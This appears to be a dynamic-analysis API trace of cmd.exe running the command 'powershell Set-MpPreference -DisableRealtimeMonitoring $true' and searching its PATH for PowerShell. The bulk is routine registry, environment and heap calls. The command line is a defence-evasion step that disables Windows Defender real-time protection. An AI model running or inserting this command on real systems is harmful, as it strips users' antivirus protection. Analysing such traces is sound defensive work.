	[0046.570] FreeEnvironmentStringsW (penv=0x3702e0) returned 1
	[0046.570] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x17e688 | out: phkResult=0x17e688*=0x40) returned 0x0
	[0046.570] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x17e690, lpData=0x17e694, lpcbData=0x17e68c*=0x1000 | out: lpType=0x17e690*=0x0, lpData=0x17e694*=0x90, lpcbData=0x17e68c*=0x1000) returned 0x2
	[0046.570] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x17e690, lpData=0x17e694, lpcbData=0x17e68c*=0x1000 | out: lpType=0x17e690*=0x4, lpData=0x17e694*=0x1, lpcbData=0x17e68c*=0x4) returned 0x0
	[0046.570] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x17e690, lpData=0x17e694, lpcbData=0x17e68c*=0x1000 | out: lpType=0x17e690*=0x0, lpData=0x17e694*=0x1, lpcbData=0x17e68c*=0x1000) returned 0x2
	[0046.570] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x17e690, lpData=0x17e694, lpcbData=0x17e68c*=0x1000 | out: lpType=0x17e690*=0x4, lpData=0x17e694*=0x0, lpcbData=0x17e68c*=0x4) returned 0x0
	[0046.570] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x17e690, lpData=0x17e694, lpcbData=0x17e68c*=0x1000 | out: lpType=0x17e690*=0x4, lpData=0x17e694*=0x40, lpcbData=0x17e68c*=0x4) returned 0x0
	[0046.570] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x17e690, lpData=0x17e694, lpcbData=0x17e68c*=0x1000 | out: lpType=0x17e690*=0x4, lpData=0x17e694*=0x40, lpcbData=0x17e68c*=0x4) returned 0x0
	[0046.570] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x17e690, lpData=0x17e694, lpcbData=0x17e68c*=0x1000 | out: lpType=0x17e690*=0x0, lpData=0x17e694*=0x40, lpcbData=0x17e68c*=0x1000) returned 0x2
	[0046.570] RegCloseKey (hKey=0x40) returned 0x0
	[0046.570] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x17e688 | out: phkResult=0x17e688*=0x40) returned 0x0
	[0046.571] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x17e690, lpData=0x17e694, lpcbData=0x17e68c*=0x1000 | out: lpType=0x17e690*=0x0, lpData=0x17e694*=0x40, lpcbData=0x17e68c*=0x1000) returned 0x2
	[0046.571] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x17e690, lpData=0x17e694, lpcbData=0x17e68c*=0x1000 | out: lpType=0x17e690*=0x4, lpData=0x17e694*=0x1, lpcbData=0x17e68c*=0x4) returned 0x0
	[0046.571] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x17e690, lpData=0x17e694, lpcbData=0x17e68c*=0x1000 | out: lpType=0x17e690*=0x0, lpData=0x17e694*=0x1, lpcbData=0x17e68c*=0x1000) returned 0x2
	[0046.571] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x17e690, lpData=0x17e694, lpcbData=0x17e68c*=0x1000 | out: lpType=0x17e690*=0x4, lpData=0x17e694*=0x0, lpcbData=0x17e68c*=0x4) returned 0x0
	[0046.571] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x17e690, lpData=0x17e694, lpcbData=0x17e68c*=0x1000 | out: lpType=0x17e690*=0x4, lpData=0x17e694*=0x9, lpcbData=0x17e68c*=0x4) returned 0x0
	[0046.571] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x17e690, lpData=0x17e694, lpcbData=0x17e68c*=0x1000 | out: lpType=0x17e690*=0x4, lpData=0x17e694*=0x9, lpcbData=0x17e68c*=0x4) returned 0x0
	[0046.571] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x17e690, lpData=0x17e694, lpcbData=0x17e68c*=0x1000 | out: lpType=0x17e690*=0x0, lpData=0x17e694*=0x9, lpcbData=0x17e68c*=0x1000) returned 0x2
	[0046.571] RegCloseKey (hKey=0x40) returned 0x0
	[0046.571] time (in: timer=0x0 | out: timer=0x0) returned 0x5cdadf32
	[0046.571] srand (_Seed=0x5cdadf32) 
	[0046.571] GetCommandLineW () returned="/c powershell Set-MpPreference -DisableRealtimeMonitoring $true"
	[0046.571] GetCommandLineW () returned="/c powershell Set-MpPreference -DisableRealtimeMonitoring $true"
	[0046.571] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a855260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0046.571] GetProcessHeap () returned 0x360000
	[0046.572] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0x210) returned 0x3702e0
	[0046.572] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3702e8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b
	[0046.572] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a860640, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87
	[0046.572] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a860640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0046.572] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a860640, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0046.572] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13
	[0046.572] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11
	[0046.572] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13
	[0046.572] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13
	[0046.572] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12
	[0046.572] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4
	[0046.572] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2
	[0046.572] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8
	[0046.572] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1
	[0046.572] GetProcessHeap () returned 0x360000
	[0046.572] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x370c20 | out: hHeap=0x360000) returned 1
	[0046.572] GetEnvironmentStringsW () returned 0x3704f8*
	[0046.572] GetProcessHeap () returned 0x360000
	[0046.573] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0x94a) returned 0x3727f8
	[0046.573] FreeEnvironmentStringsW (penv=0x3704f8) returned 1
	[0046.573] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a860640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0046.573] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a860640, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0046.573] _wcsicmp (_String1="KEYS", _String2="CD") returned 8
	[0046.573] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6
	[0046.573] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8
	[0046.573] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8
	[0046.573] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7
	[0046.573] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9
	[0046.573] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7
	[0046.573] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3
	[0046.573] GetProcessHeap () returned 0x360000
	[0046.573] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0x30) returned 0x370160
	[0046.573] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x17f454 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0046.573] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x104, lpBuffer=0x17f454, lpFilePart=0x17f450 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x17f450*="system32") returned 0x13
	[0046.573] GetFileAttributesW (lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 0x10
	[0046.573] FindFirstFileW (in: lpFileName="C:\\Windows", lpFindFileData=0x17f1d0 | out: lpFindFileData=0x17f1d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa191445, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x8797820, ftLastAccessTime.dwHighDateTime=0x1d4d67f, ftLastWriteTime.dwLowDateTime=0x8797820, ftLastWriteTime.dwHighDateTime=0x1d4d67f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0x3607f0
	[0046.574] FindClose (in: hFindFile=0x3607f0 | out: hFindFile=0x3607f0) returned 1
	[0046.574] FindFirstFileW (in: lpFileName="C:\\Windows\\system32", lpFindFileData=0x17f1d0 | out: lpFindFileData=0x17f1d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb15659b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x3a13b080, ftLastAccessTime.dwHighDateTime=0x1d4d68e, ftLastWriteTime.dwLowDateTime=0x3a13b080, ftLastWriteTime.dwHighDateTime=0x1d4d68e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System32", cAlternateFileName="")) returned 0x3607f0
	[0046.574] FindClose (in: hFindFile=0x3607f0 | out: hFindFile=0x3607f0) returned 1
	[0046.574] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10
	[0046.574] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1
	[0046.574] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1
	[0046.574] GetProcessHeap () returned 0x360000
	[0046.574] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x3727f8 | out: hHeap=0x360000) returned 1
	[0046.574] GetEnvironmentStringsW () returned 0x3704f8*
	[0046.574] GetProcessHeap () returned 0x360000
	[0046.574] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0x97a) returned 0x371ea0
	[0046.574] FreeEnvironmentStringsW (penv=0x3704f8) returned 1
	[0046.574] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a855260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0046.574] GetProcessHeap () returned 0x360000
	[0046.574] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x370160 | out: hHeap=0x360000) returned 1
	[0046.574] GetProcessHeap () returned 0x360000
	[0046.575] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0x400e) returned 0x373ad8
	[0046.575] GetProcessHeap () returned 0x360000
	[0046.575] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0x86) returned 0x372828
	[0046.575] GetProcessHeap () returned 0x360000
	[0046.575] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x373ad8 | out: hHeap=0x360000) returned 1
	[0046.575] GetConsoleOutputCP () returned 0x1b5
	[0046.576] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a854260 | out: lpCPInfo=0x4a854260) returned 1
	[0046.576] GetUserDefaultLCID () returned 0x409
	[0046.576] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a854950, cchData=8 | out: lpLCData=":") returned 2
	[0046.576] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x17f594, cchData=128 | out: lpLCData="0") returned 2
	[0046.576] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x17f594, cchData=128 | out: lpLCData="0") returned 2
	[0046.576] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x17f594, cchData=128 | out: lpLCData="1") returned 2
	[0046.576] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a854940, cchData=8 | out: lpLCData="/") returned 2
	[0046.576] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a854d80, cchData=32 | out: lpLCData="Mon") returned 4
	[0046.577] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a854d40, cchData=32 | out: lpLCData="Tue") returned 4
	[0046.577] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a854d00, cchData=32 | out: lpLCData="Wed") returned 4
	[0046.577] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a854cc0, cchData=32 | out: lpLCData="Thu") returned 4
	[0046.577] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a854c80, cchData=32 | out: lpLCData="Fri") returned 4
	[0046.577] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a854c40, cchData=32 | out: lpLCData="Sat") returned 4
	[0046.577] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a854c00, cchData=32 | out: lpLCData="Sun") returned 4
	[0046.577] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a854930, cchData=8 | out: lpLCData=".") returned 2
	[0046.577] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a854920, cchData=8 | out: lpLCData=",") returned 2
	[0046.577] setlocale (category=0, locale=".OCP") returned="English_United States.437"
	[0046.579] GetProcessHeap () returned 0x360000
	[0046.579] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x20c) returned 0x3728b8
	[0046.579] GetConsoleTitleW (in: lpConsoleTitle=0x3728b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0046.579] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76b10000
	[0046.579] GetProcAddress (hModule=0x76b10000, lpProcName="CopyFileExW") returned 0x76b4ac6c
	[0046.579] GetProcAddress (hModule=0x76b10000, lpProcName="IsDebuggerPresent") returned 0x76b53ea8
	[0046.579] GetProcAddress (hModule=0x76b10000, lpProcName="SetConsoleInputExeNameW") returned 0x76b62732
	[0046.580] GetProcessHeap () returned 0x360000
	[0046.580] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0x400a) returned 0x373ad8
	[0046.580] GetProcessHeap () returned 0x360000
	[0046.580] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x373ad8 | out: hHeap=0x360000) returned 1
	[0046.581] _wcsicmp (_String1="powershell", _String2=")") returned 71
	[0046.581] _wcsicmp (_String1="FOR", _String2="powershell") returned -10
	[0046.581] _wcsicmp (_String1="FOR/?", _String2="powershell") returned -10
	[0046.581] _wcsicmp (_String1="IF", _String2="powershell") returned -7
	[0046.581] _wcsicmp (_String1="IF/?", _String2="powershell") returned -7
	[0046.581] _wcsicmp (_String1="REM", _String2="powershell") returned 2
	[0046.581] _wcsicmp (_String1="REM/?", _String2="powershell") returned 2
	[0046.581] GetProcessHeap () returned 0x360000
	[0046.581] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0x58) returned 0x372ad0
	[0046.581] GetProcessHeap () returned 0x360000
	[0046.581] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0x1e) returned 0x36e968
	[0046.582] GetProcessHeap () returned 0x360000
	[0046.582] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0x6e) returned 0x372b30
	[0046.583] GetConsoleTitleW (in: lpConsoleTitle=0x17f28c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0046.583] _wcsicmp (_String1="powershell", _String2="DIR") returned 12
	[0046.583] _wcsicmp (_String1="powershell", _String2="ERASE") returned 11
	[0046.584] _wcsicmp (_String1="powershell", _String2="DEL") returned 12
	[0046.584] _wcsicmp (_String1="powershell", _String2="TYPE") returned -4
	[0046.584] _wcsicmp (_String1="powershell", _String2="COPY") returned 13
	[0046.584] _wcsicmp (_String1="powershell", _String2="CD") returned 13
	[0046.584] _wcsicmp (_String1="powershell", _String2="CHDIR") returned 13
	[0046.584] _wcsicmp (_String1="powershell", _String2="RENAME") returned -2
	[0046.584] _wcsicmp (_String1="powershell", _String2="REN") returned -2
	[0046.584] _wcsicmp (_String1="powershell", _String2="ECHO") returned 11
	[0046.584] _wcsicmp (_String1="powershell", _String2="SET") returned -3
	[0046.584] _wcsicmp (_String1="powershell", _String2="PAUSE") returned 14
	[0046.584] _wcsicmp (_String1="powershell", _String2="DATE") returned 12
	[0046.584] _wcsicmp (_String1="powershell", _String2="TIME") returned -4
	[0046.584] _wcsicmp (_String1="powershell", _String2="PROMPT") returned -3
	[0046.584] _wcsicmp (_String1="powershell", _String2="MD") returned 3
	[0046.584] _wcsicmp (_String1="powershell", _String2="MKDIR") returned 3
	[0046.584] _wcsicmp (_String1="powershell", _String2="RD") returned -2
	[0046.584] _wcsicmp (_String1="powershell", _String2="RMDIR") returned -2
	[0046.584] _wcsicmp (_String1="powershell", _String2="PATH") returned 14
	[0046.584] _wcsicmp (_String1="powershell", _String2="GOTO") returned 9
	[0046.584] _wcsicmp (_String1="powershell", _String2="SHIFT") returned -3
	[0046.584] _wcsicmp (_String1="powershell", _String2="CLS") returned 13
	[0046.584] _wcsicmp (_String1="powershell", _String2="CALL") returned 13
	[0046.584] _wcsicmp (_String1="powershell", _String2="VERIFY") returned -6
	[0046.584] _wcsicmp (_String1="powershell", _String2="VER") returned -6
	[0046.584] _wcsicmp (_String1="powershell", _String2="VOL") returned -6
	[0046.584] _wcsicmp (_String1="powershell", _String2="EXIT") returned 11
	[0046.584] _wcsicmp (_String1="powershell", _String2="SETLOCAL") returned -3
	[0046.584] _wcsicmp (_String1="powershell", _String2="ENDLOCAL") returned 11
	[0046.584] _wcsicmp (_String1="powershell", _String2="TITLE") returned -4
	[0046.584] _wcsicmp (_String1="powershell", _String2="START") returned -3
	[0046.584] _wcsicmp (_String1="powershell", _String2="DPATH") returned 12
	[0046.585] _wcsicmp (_String1="powershell", _String2="KEYS") returned 5
	[0046.585] _wcsicmp (_String1="powershell", _String2="MOVE") returned 3
	[0046.585] _wcsicmp (_String1="powershell", _String2="PUSHD") returned -6
	[0046.585] _wcsicmp (_String1="powershell", _String2="POPD") returned 7
	[0046.585] _wcsicmp (_String1="powershell", _String2="ASSOC") returned 15
	[0046.585] _wcsicmp (_String1="powershell", _String2="FTYPE") returned 10
	[0046.585] _wcsicmp (_String1="powershell", _String2="BREAK") returned 14
	[0046.585] _wcsicmp (_String1="powershell", _String2="COLOR") returned 13
	[0046.585] _wcsicmp (_String1="powershell", _String2="MKLINK") returned 3
	[0046.585] _wcsicmp (_String1="powershell", _String2="DIR") returned 12
	[0046.585] _wcsicmp (_String1="powershell", _String2="ERASE") returned 11
	[0046.585] _wcsicmp (_String1="powershell", _String2="DEL") returned 12
	[0046.585] _wcsicmp (_String1="powershell", _String2="TYPE") returned -4
	[0046.585] _wcsicmp (_String1="powershell", _String2="COPY") returned 13
	[0046.585] _wcsicmp (_String1="powershell", _String2="CD") returned 13
	[0046.585] _wcsicmp (_String1="powershell", _String2="CHDIR") returned 13
	[0046.585] _wcsicmp (_String1="powershell", _String2="RENAME") returned -2
	[0046.585] _wcsicmp (_String1="powershell", _String2="REN") returned -2
	[0046.585] _wcsicmp (_String1="powershell", _String2="ECHO") returned 11
	[0046.585] _wcsicmp (_String1="powershell", _String2="SET") returned -3
	[0046.585] _wcsicmp (_String1="powershell", _String2="PAUSE") returned 14
	[0046.585] _wcsicmp (_String1="powershell", _String2="DATE") returned 12
	[0046.585] _wcsicmp (_String1="powershell", _String2="TIME") returned -4
	[0046.585] _wcsicmp (_String1="powershell", _String2="PROMPT") returned -3
	[0046.585] _wcsicmp (_String1="powershell", _String2="MD") returned 3
	[0046.585] _wcsicmp (_String1="powershell", _String2="MKDIR") returned 3
	[0046.585] _wcsicmp (_String1="powershell", _String2="RD") returned -2
	[0046.585] _wcsicmp (_String1="powershell", _String2="RMDIR") returned -2
	[0046.585] _wcsicmp (_String1="powershell", _String2="PATH") returned 14
	[0046.586] _wcsicmp (_String1="powershell", _String2="GOTO") returned 9
	[0046.586] _wcsicmp (_String1="powershell", _String2="SHIFT") returned -3
	[0046.586] _wcsicmp (_String1="powershell", _String2="CLS") returned 13
	[0046.586] _wcsicmp (_String1="powershell", _String2="CALL") returned 13
	[0046.586] _wcsicmp (_String1="powershell", _String2="VERIFY") returned -6
	[0046.586] _wcsicmp (_String1="powershell", _String2="VER") returned -6
	[0046.586] _wcsicmp (_String1="powershell", _String2="VOL") returned -6
	[0046.586] _wcsicmp (_String1="powershell", _String2="EXIT") returned 11
	[0046.586] _wcsicmp (_String1="powershell", _String2="SETLOCAL") returned -3
	[0046.586] _wcsicmp (_String1="powershell", _String2="ENDLOCAL") returned 11
	[0046.586] _wcsicmp (_String1="powershell", _String2="TITLE") returned -4
	[0046.586] _wcsicmp (_String1="powershell", _String2="START") returned -3
	[0046.586] _wcsicmp (_String1="powershell", _String2="DPATH") returned 12
	[0046.586] _wcsicmp (_String1="powershell", _String2="KEYS") returned 5
	[0046.586] _wcsicmp (_String1="powershell", _String2="MOVE") returned 3
	[0046.586] _wcsicmp (_String1="powershell", _String2="PUSHD") returned -6
	[0046.586] _wcsicmp (_String1="powershell", _String2="POPD") returned 7
	[0046.586] _wcsicmp (_String1="powershell", _String2="ASSOC") returned 15
	[0046.586] _wcsicmp (_String1="powershell", _String2="FTYPE") returned 10
	[0046.586] _wcsicmp (_String1="powershell", _String2="BREAK") returned 14
	[0046.586] _wcsicmp (_String1="powershell", _String2="COLOR") returned 13
	[0046.586] _wcsicmp (_String1="powershell", _String2="MKLINK") returned 3
	[0046.586] _wcsicmp (_String1="powershell", _String2="FOR") returned 10
	[0046.586] _wcsicmp (_String1="powershell", _String2="IF") returned 7
	[0046.586] _wcsicmp (_String1="powershell", _String2="REM") returned -2
	[0046.587] GetProcessHeap () returned 0x360000
	[0046.587] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0x210) returned 0x372ba8
	[0046.587] GetProcessHeap () returned 0x360000
	[0046.587] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0x84) returned 0x372dc0
	[0046.587] _wcsnicmp (_String1="powe", _String2="cmd ", _MaxCount=0x4) returned 13
	[0046.587] GetProcessHeap () returned 0x360000
	[0046.587] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0x418) returned 0x3607f0
	[0046.587] SetErrorMode (uMode=0x0) returned 0x0
	[0046.587] SetErrorMode (uMode=0x1) returned 0x0
	[0046.587] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3607f8, lpFilePart=0x17edac | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x17edac*="system32") returned 0x13
	[0046.588] SetErrorMode (uMode=0x0) returned 0x1
	[0046.588] GetProcessHeap () returned 0x360000
	[0046.588] RtlReAllocateHeap (Heap=0x360000, Flags=0x0, Ptr=0x3607f0, Size=0x46) returned 0x3607f0
	[0046.588] GetProcessHeap () returned 0x360000
	[0046.588] RtlSizeHeap (HeapHandle=0x360000, Flags=0x0, MemoryPointer=0x3607f0) returned 0x46
	[0046.588] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a860640, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87
	[0046.588] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
	[0046.588] GetProcessHeap () returned 0x360000
	[0046.588] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0x144) returned 0x372e50
	[0046.588] GetProcessHeap () returned 0x360000
	[0046.588] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0x280) returned 0x360840
	[0046.594] GetProcessHeap () returned 0x360000
	[0046.594] RtlReAllocateHeap (Heap=0x360000, Flags=0x0, Ptr=0x360840, Size=0x146) returned 0x360840
	[0046.594] GetProcessHeap () returned 0x360000
	[0046.594] RtlSizeHeap (HeapHandle=0x360000, Flags=0x0, MemoryPointer=0x360840) returned 0x146
	[0046.594] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a860640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0046.594] GetProcessHeap () returned 0x360000
	[0046.594] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0xe0) returned 0x372fa0
	[0046.594] GetProcessHeap () returned 0x360000
	[0046.594] RtlReAllocateHeap (Heap=0x360000, Flags=0x0, Ptr=0x372fa0, Size=0x76) returned 0x372fa0
	[0046.594] GetProcessHeap () returned 0x360000
	[0046.594] RtlSizeHeap (HeapHandle=0x360000, Flags=0x0, MemoryPointer=0x372fa0) returned 0x76
	[0046.595] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0046.595] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\powershell.*", fInfoLevelId=0x1, lpFindFileData=0x17eb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x17eb28) returned 0xffffffff
	[0046.596] GetLastError () returned 0x2
	[0046.596] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\powershell", fInfoLevelId=0x1, lpFindFileData=0x17eb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x17eb28) returned 0xffffffff
	[0046.596] GetLastError () returned 0x2
	[0046.596] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0046.596] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\powershell.*", fInfoLevelId=0x1, lpFindFileData=0x17eb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x17eb28) returned 0xffffffff
	[0046.596] GetLastError () returned 0x2
	[0046.596] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\powershell", fInfoLevelId=0x1, lpFindFileData=0x17eb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x17eb28) returned 0xffffffff
	[0046.597] GetLastError () returned 0x2
	[0046.597] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0046.597] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\powershell.*", fInfoLevelId=0x1, lpFindFileData=0x17eb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x17eb28) returned 0xffffffff
	[0046.597] GetLastError () returned 0x2
	[0046.597] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\powershell", fInfoLevelId=0x1, lpFindFileData=0x17eb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x17eb28) returned 0xffffffff
	[0046.597] GetLastError () returned 0x2
	[0046.597] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0046.597] FindFirstFileExW (in: lpFileName="C:\\Windows\\powershell.*", fInfoLevelId=0x1, lpFindFileData=0x17eb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x17eb28) returned 0xffffffff
	[0046.597] GetLastError () returned 0x2
	[0046.598] FindFirstFileExW (in: lpFileName="C:\\Windows\\powershell", fInfoLevelId=0x1, lpFindFileData=0x17eb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x17eb28) returned 0xffffffff
	[0046.599] GetLastError () returned 0x2
	[0046.599] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0046.599] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.*", fInfoLevelId=0x1, lpFindFileData=0x17eb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x17eb28) returned 0xffffffff
	[0046.599] GetLastError () returned 0x2
